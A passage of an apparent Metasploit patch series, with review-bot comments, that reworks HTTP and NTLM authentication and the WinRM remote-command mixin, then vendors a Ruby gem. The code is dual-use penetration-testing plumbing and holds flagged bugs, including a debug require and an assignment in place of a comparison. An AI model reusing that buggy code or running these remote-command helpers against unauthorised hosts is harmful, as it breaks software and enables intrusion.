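Review bot: The credential override added to `send_request_raw` writes per-request credentials onto the client object returned by `connect(opts)`, and the same four lines are repeated in `send_request_cgi` below and in `Auxiliary::Web::HTTP`. The context of the preceding hunk ("If this connection is global, persist it") suggests that client can be shared; if so, credentials supplied for one request would stay set on it and be offered on later requests that did not ask for them, which is worth confirming. A small private helper that applies the override would remove the duplication and give one place to document, or reset, that state. Both method bodies continue outside their hunks.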
@@ -277,241 +293,8 @@ module Exploit::Remote::HttpClient # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless 
resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). 
- resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 
'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 46bfffcc86..ba46142a45 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -294,7 +296,7 @@ class Client # def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + if res and res.code == 401 and res.headers['WWW-Authenticate'] res = send_auth(res, req.opts, t, persist) end res @@ -329,11 +331,6 @@ class Client conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object 
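Review bot: In `basic_auth`, the guard `return if not datastore['USERNAME']` no longer fires for an unset username, because this patch gives the USERNAME option a default of `''`; the method then returns `":"` rather than nil. The fallback in `datastore['PASSWORD'].to_s || ''` is also dead, since `to_s` never returns nil. Suggest `return if datastore['USERNAME'].to_s.empty?` followed by `"#{datastore['USERNAME']}:#{datastore['PASSWORD']}"`.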
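Review bot: `require 'pry'` at the top of lib/rex/proto/http/client.rb looks like a leftover from a debugging session. It makes an interactive debugger a load-time dependency of the HTTP client, so the library fails to load wherever that gem is absent, and nothing in the visible hunks uses it. The line should be dropped before merge.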
@@ -343,8 +340,23 @@ class Client # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) - opts['username'] ||= self.username - opts['password'] ||= self.password + if opts['username'].nil? or opts['username'] == '' + if self.username and not (self.username == '') + opts['username'] = self.username + else + opts['username'] = nil + end + end + + if opts['password'].nil? or opts['password'] == '' + if self.password and not (self.password == '') + opts['password'] = self.password + else + opts['password'] = nil + end + end + + return res if opts['username'].nil? or opts['username'] = '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] From ac6fdf24a28184531ae5c90a09ce251258f30416 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:01:43 -0600 Subject: [PATCH 21/87] Fix winrm mixin from revert merge --- lib/msf/core/exploit/winrm.rb | 117 ++++++---------------------------- 1 file changed, 20 insertions(+), 97 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f724..e61a29e5aa 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ module Exploit::Remote::WinRM c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ module Exploit::Remote::WinRM end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil 
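Review bot: The new guard in send_auth, `return res if opts['username'].nil? or opts['username'] = ''`, assigns instead of comparing. The assignment evaluates to `''`, which is truthy in Ruby, so the method always returns the original 401 response and never reaches the Basic/Digest/NTLM handling below; it also overwrites whatever username was just resolved. The line should read `return res if opts['username'].nil? or opts['username'] == ''`. The two nested blocks above it could then collapse to a single blank-to-nil normalisation, since they only fall back to `self.username` / `self.password` when the option is nil or empty. The rest of send_auth lies outside this hunk.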
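Review bot: In the winrm.rb hunk at @@ -42,7 +42,7 @@, `resp = send_winrm_request(opts.merge({` passes an options hash as the first argument. The helper added later in this patch is `send_winrm_request(data, timeout=20)`, which puts its first argument into `'data' => data` and builds its own uri/method/ctype. The merged hash would therefore be sent as the request body, and the `'uri'`, `'method'` and `'ctype'` keys given here would not act as request options. Either keep `send_request_cgi(opts.merge({` for this probe or pass only the SOAP body and the timeout to the helper. The `c = connect(opts)` and `ctype` locals above the call also look unused after the change; the enclosing method starts and ends outside the hunk, so this should be confirmed against the full file.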
@@ -76,17 +76,17 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end 
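Review bot: Only the first `send_winrm_request` result in this method is tested with `resp.nil?`. The responses to the command and receive requests are handed straight to `winrm_get_cmd_id(resp)` and `winrm_get_cmd_streams(resp)`. The earlier nil check shows the helper can return nil, so a timeout or dropped connection in the middle of the sequence would presumably surface as a NoMethodError inside those parsers (their bodies are not visible here). Adding `return nil if resp.nil?` after each request would fail cleanly; the same applies to the hunk at @@ -101,9 +101,9 @@ in winrm_run_cmd_hanging. The results of the terminate and delete requests are assigned to `resp` but never read, so those two assignments can be dropped. Both method bodies start outside their hunks.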
@@ -219,94 +219,6 @@ module Exploit::Remote::WinRM ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = 
c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,17 @@ module Exploit::Remote::WinRM return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end private From 6abbbeb3ca154776089b45c23624890b298e69b6 Mon Sep 17 00:00:00 2001 
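Review bot: The new `send_winrm_request(data, timeout=20)` at @@ -329,6 +241,17 @@ has no doc comment, although it changes the contract callers relied on. The removed `send_request_ntlm` returned `[resp, c]` and took `DOMAIN` and the `NTLM::*` datastore options into account, while this helper returns whatever `send_request_cgi(opts,timeout)` returns and forwards only `USERNAME` and `PASSWORD`. I would add a YARD block stating that it POSTs `data` as `application/soap+xml` to `datastore['URI']` with the datastore credentials, with `@param data [String]`, `@param timeout [Integer]` and an `@return` line for the response or nil. Whether the domain and NTLM settings are still applied further down the stack is not visible in this hunk and is worth confirming, since a silent change in how credentials are presented affects every WinRM module. The method is also added above `private`, so it becomes part of the mixin's public surface.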
From: David Maloney Date: Tue, 19 Feb 2013 22:17:25 -0600 Subject: [PATCH 22/87] put gemcache for methodsource back --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ 13 files changed, 721 insertions(+) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml new file mode 100644 index 0000000000..ba51bba6b2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml @@ -0,0 +1,17 @@ +rvm: + - 1.8.7 + - 1.9.2 + - 1.9.3 + - ree + - rbx-18mode + - rbx-19mode + - jruby + +notifications: + irc: "irc.freenode.org#pry" + recipients: + - jrmair@gmail.com + +branches: + only: + - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts new file mode 100644 index 0000000000..a4e7838016 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts @@ -0,0 +1 @@ +-m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile new file mode 100644 index 0000000000..e45e65f871 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile @@ -0,0 +1,2 @@ +source :rubygems +gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE new file mode 100644 index 0000000000..d1a50d62d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE 
@@ -0,0 +1,25 @@ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown new file mode 100644 index 0000000000..d91b810a3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown 
@@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
+ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile 
@@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" 
+ end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb 
@@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if 